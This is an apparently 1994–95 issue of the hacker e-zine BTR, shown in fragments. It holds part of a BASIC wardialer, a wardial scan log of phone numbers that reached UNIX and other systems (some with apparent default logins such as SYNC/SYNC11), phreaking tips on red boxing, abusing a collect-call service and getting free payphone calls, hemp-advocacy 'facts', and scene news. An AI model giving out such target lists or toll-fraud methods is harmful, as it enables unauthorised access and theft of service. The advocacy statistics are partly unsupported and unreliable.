#1: OPEN "COM2:19200" FOR RANDOM AS #1: NUMS$ = "": SLEEP 2: TIMEE = 0: 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TR(1, TOTAL$, "BUSY") &gt; 0 THEN PRINT "BUSY": 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$ = CHR$(27) THEN CLOSE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 = VAL(SCAN$(8)) - Tim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IMEE &lt; 0 THEN PRINT #1, "ATZH0": CLOSE #1: OPEN "COM2:19200" FOR RANDOM AS #1: GO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5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IMEE; " SECONDS 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 = 57 THE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PLEASE PRESS ENTER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.ARTiCLE.12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By Substance from 12-24-94 up to 01-05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022 - Dead                      ��  12-24-1994  21:5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037 - Dead                      ��  12-24-1994  22:0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038 - Dead                      ��  12-24-1994  22:0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166 - ID + PW                   ��  12-24-1994  23:1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193 - SCo UNiX                  ��  12-24-1994  23:2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266 - Dead                      ��  12-25-1994  00:0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270 - TeleSphere BBS            ��  12-25-1994  00:0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283 - Needs Acct Id  e,7,1      ��  12-25-1994  00:0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294 - Dead                      ��  12-25-1994  00:1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582 - Sco UniX                  ��  12-25-1994  02:2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589 - Sco UniX                  ��  12-25-1994  02:2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602 - Dead                      ��  12-25-1994  02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616 - UniX                      ��  12-25-1994  02:3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734 - UniX                      ��  12-25-1994  03:3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740 - Dead                      ��  12-25-1994  03:3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798 - Dead                      ��  12-25-1994  04:0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810 - Dead                      ��  12-25-1994  04:0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811 - Dead                      ��  12-25-1994  04:0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827 - UniX                      ��  12-25-1994  04:1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0836 - Password Required         ��  12-25-1994  04:1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016 - Different Terminal Needed ��  12-25-1994  05:3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024 - Enter Password            ��  12-25-1994  05:4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033 - Dead                      ��  12-25-1994  05:4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070 - 12oo,  num                ��  12-25-1994  06:0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092 - Dead                      ��  12-25-1994  06:1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163 - Federal Interstate Bank?  ��  12-25-1994  06:4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164 - Dead                      ��  12-25-1994  06:4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258 - Welcome To Albany, Unix   ��  12-25-1994  07:3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354 - Dead                      ��  12-25-1994  08:1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356 - Dead                      ��  12-25-1994  08:1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377 - Dead                      ��  12-25-1994  08:2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508 - Dead                      ��  12-25-1994  09:3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514 - Dead                      ��  12-25-1994  09:4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601 - Some very weird system    ��  12-25-1994  17:1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1740 - UNiX                      ��  12-27-1994  23:2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2003 - Dead                      ��  12-28-1994  01:2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2155 - Dead                      ��  12-28-1994  02:3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2189 - Dead                      ��  12-28-1994  02:5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2233 - Dead                      ��  12-28-1994  03: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2319 - Dead                      ��  12-28-1994  03:5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2345 - Dead                      ��  12-28-1994  04:0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2661 - Dead                      ��  12-28-1994  06:3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2742 - Dead                      ��  12-28-1994  07:0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2951 - Dead                      ��  12-28-1994  08:4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2959 - Dead                      ��  12-28-1994  08:5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3292 - Dead                      ��  12-28-1994  14:1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3355 - Modem, No Con             ��  12-28-1994  14:4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3369 - OfficeMax StoreMax ]I[    ��  12-28-1994  14:5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3419 - Dead                      ��  12-28-1994  15:1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3424 - Dead                      ��  12-28-1994  15:1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3501 - Dead                      ��  12-28-1994  16:5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3511 - Fax                       ��  12-28-1994  16:5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3554 - UNiX - SYNC SYNC11        ��  12-28-1994  17:2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3776 - UNiX                      ��  12-29-1994  17:1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4287 - Different Terminal        ��  12-30-1994  03:2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4394 - SCoUNiX                   ��  12-30-1994  04:1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4452 - Dead                      ��  12-30-1994  04:4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4892 - Dead                      ��  12-30-1994  08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4934 - Different Terminal        ��  12-30-1994  08:2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5161 - Unix                      ��  12-30-1994  10:0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5176 - Dead                      ��  12-30-1994  10:1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5215 - UNiX - ID: SYNC/SYNC11    ��  12-30-1994  14:0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5344 - UNiX                      ��  01-03-1995  07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5397 - Different Terminal        ��  01-03-1995  08:1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5427 - (144)                     ��  01-03-1995  08:2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5524 - Dead                      ��  01-03-1995  09:1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5607 - Dead                      ��  01-03-1995  09:4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5917 - (1200)                    ��  01-03-1995  12:0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282 - Different Terminal        ��  01-03-1995  14:5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337 - Dead                      ��  01-05-1995  02:1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461 - Dead                      ��  01-05-1995  03:0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487 - Dead                      ��  01-05-1995  03:1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538 - Dead                      ��  01-05-1995  03:3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543 - Dead                      ��  01-05-1995  03:3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551 - Dead                      ��  01-05-1995  03:4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588 - Dead                      ��  01-05-1995  03:5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799 - Dead                      ��  01-05-1995  05:2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822 - Dead                      ��  01-05-1995  05:3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916 - Dead                      ��  01-05-1995  06:1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970 - Special Terminal          ��  01-05-1995  06:3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977 - UNiX                      ��  01-05-1995  06:4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6997 - UNiX                      ��  01-05-1995  06:4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7254 - (96oo)                    ��  01-05-1995  08:5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7500 - Dead                      ��  01-05-1995  10:4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7594 - Dead                      ��  01-05-1995  11:2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7718 - (12oo) Says Weird Shit    ��  01-05-1995  12:1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t 459-8059 - Dead                      ��  01-05-1995  14:41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lot of werk so enjoy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can Done sucessfully by PsychoScan 2.10 (PsychoScan's latest o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TP sites including ftp.winternet.com, and spy.org. Also on AWoL [5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.ARTiCLE.13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BTR Sho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ho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� What are BTR Sho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 shorts are pieces of info that are too small for their ow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their short pieces. Hence the name shorts. If you can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send to AWoL [518] 383-13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&gt;� Isn't Pilgrim Telephone (a New England Based Telco) pretty arrog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ir collect calling service?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800] 382-5288 or [800] FUCK-A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800] 382-5624 or [800] FUCK-M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ear a duck quack really loud then you Pilgrim Telephone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selves, then you hear "Enter The Number You Wish To Call"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N and then it'll ask for your name say "Dick" and it'll call that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sk if they'll accept a collect call from Dick. Without you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+ person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&gt;� If you want a sure fire way to red box that always works then listen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this to work you have to have a properly recorded ton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ing up any 10xxx (tenex) code plus 1+ACN. Then it ask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t load of money. Like $1.35 for a local call. But since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itored theres nothing there to monitor how many coi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opp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� New AC's i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1 -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4 -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 -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3 -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6 - International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- Personal Communications Services (A SAC or Special Are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0 -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0 -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2 -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0 -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4 -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0 -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� A Brief List of 10XXX (Tenex)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22 -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5 - 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88 -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33 -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44 - Al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88 - Metro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32 - Jok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33 - Jok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55 - Wi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58 - Wi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732 - AT&amp;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89 - Metro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11 - VarTec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880 - Opti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&gt;� Quick answer th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or False you can always make free calls from a Coc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words of OJ Simpson, Absolutely, Positevely 100 percent TR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waiting for DT trick doesnt work then use your autodia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. But if that doesn't work call up the operator (0) then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distance carrier, ie : ATT. Then say I need assistance i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the #, you can't do 900's but you can do 800's and LD, + INTL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ually works. Sometimes that even works on badly programmed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BEGIN.ADD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� HEMP CAN SAVE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nabis hemp is known today primarily for its widespread us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eational drug: Cannabis flowers when smoked or ingeste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uphoric effects. Current gross domestic sales of marijuan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d at $30 bill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less well known is that hemp is an invaluable and enviro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y resource in many other areas as well. For example: "One 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emp will make the same amount and quantity of paper as four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0 year old trees without the need for chlorine in the bl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creating no toxic dioxin pollut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mature, hemp is the toughest natural fiber known; demi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ly made from hemp sailcloth; canvas take its na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Cannabis (Canv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p can also be used as a fuel. Old USDA reports show Hemp gives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 the yield of cellulose per acre compared to corn.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of converting cellulose to methanol make this a v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ution free method for powering cards, trucks, bu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ally important are the uses of Hemp for food and medicine. Canna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ds yield as much edible oil per acre as sunflowers do; th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lp is second in protein only to that of soy beans. Federal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 prohibit research into additional benificial effect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abis is well known to be helpful fro glaucoma, asthma, anore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ess, potentially replacing half the prescriptions writte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, "...there are simply no credible medical reports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ing marijuana has caused a single death...". Too b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be said of alcohol or tobac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there is growing support for taking the 'crime' out of Canna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 DA Judge Vaughn Walker notes, "I make no bones about my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at the best course of action for us to take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 of action for us to take is exactly the same course we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ohibition. And that is decrimina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save the planet. Help legalize Hemp! Cannabis Action Network (C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with over 250 organizations worldwide. Call or write to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vents in your area and how you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ABIS AC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0 BANCROFT WAY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RKEL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0) 486-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END.ADD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&gt;� 20 Quick Facts On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annabis and hemp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rijuana" was the Mexican name giv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annabis was first cultivated in China around 4000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original drafts of the Declaration of Independence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hemp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One acre of hemp will produce as much paper as 4 acres of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Hemp is a source of fiber and cloth and cordage for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George Washinton and Thomas Jefferson grew hemp. Washington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first president declared, "Make the most of the hemp seed. S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very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Hemp see is nature's perfect food. The oil from hemp seed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percentage of saturated f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Sterilized hemp seed is commonly sold as bird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Rolling papers, like Bambu, are made from hemp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In 1937, the Marijuana Tax Stamp Act prohibited the use,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ltivation of hemp/marijuana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Five years later, during WWII, the US Dept. of Agricultu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m, "Hemp For Victory," which encouraged American far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 hemp for the war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Hemp is cultivated all over the world. Today, China, Kore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gary, Russia and France are among the countries that grow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ber, paper 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Cannabis is classified as a schedule 1 drug by the FDA.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narcotic, it cannot be prescribed by doctors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In 1988, the DEA's own administravite law judge co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rijuana is one of the safest, therapuetically active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to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Cannabis can be used as a medicine to treat nausea, pain and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sms. It alleviates symptons of glaucoma, MS, AIDS, migr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debillitating ailmet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35 states have passed legistation permitting medical use of h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12 Americans recieve prescribed marijuana from the US gov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More than 400,000 Americans are arrested each year on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More than 400,000 Americans die from diseases related to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oking each year. More than 150,000 Americans die of alcohol ab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year. But in 10,000 years of usage no one has ever d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age of mariju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Packs an awesome bu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.ARTiCLE.14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BTR News &amp; Shit Like T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rew Of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D BU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quid Sky Datacom (internet LSD.ORG) is no longer. Sysops Bax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arzau are in jail for letting users post valid CC's in the Ca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Too bad, LSD was advertised in 2600 mag, had it's own Voi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3 28.8, and lots of hardware. Shit load of money down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anything else like sentencing because I didn't see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article since I don't get that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ublic Service Announcem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lamers that call the 2600 Voice BBS and don't post sh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? Are you alive? The thing is lame but it could be very goo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usy just about 24/7. With only about 3 or less posts a day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ucking sucks. So if you call you better have some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ope you liked this issue of BTR. See you soon. BTR has no deadlin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comes out from every 1 month to every month and a half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-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-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-+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+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Has Been 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T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Your New Year's Rev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 Our VM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ders Like A Box Of Chocolates, You Never Know Who Your Gunna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+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+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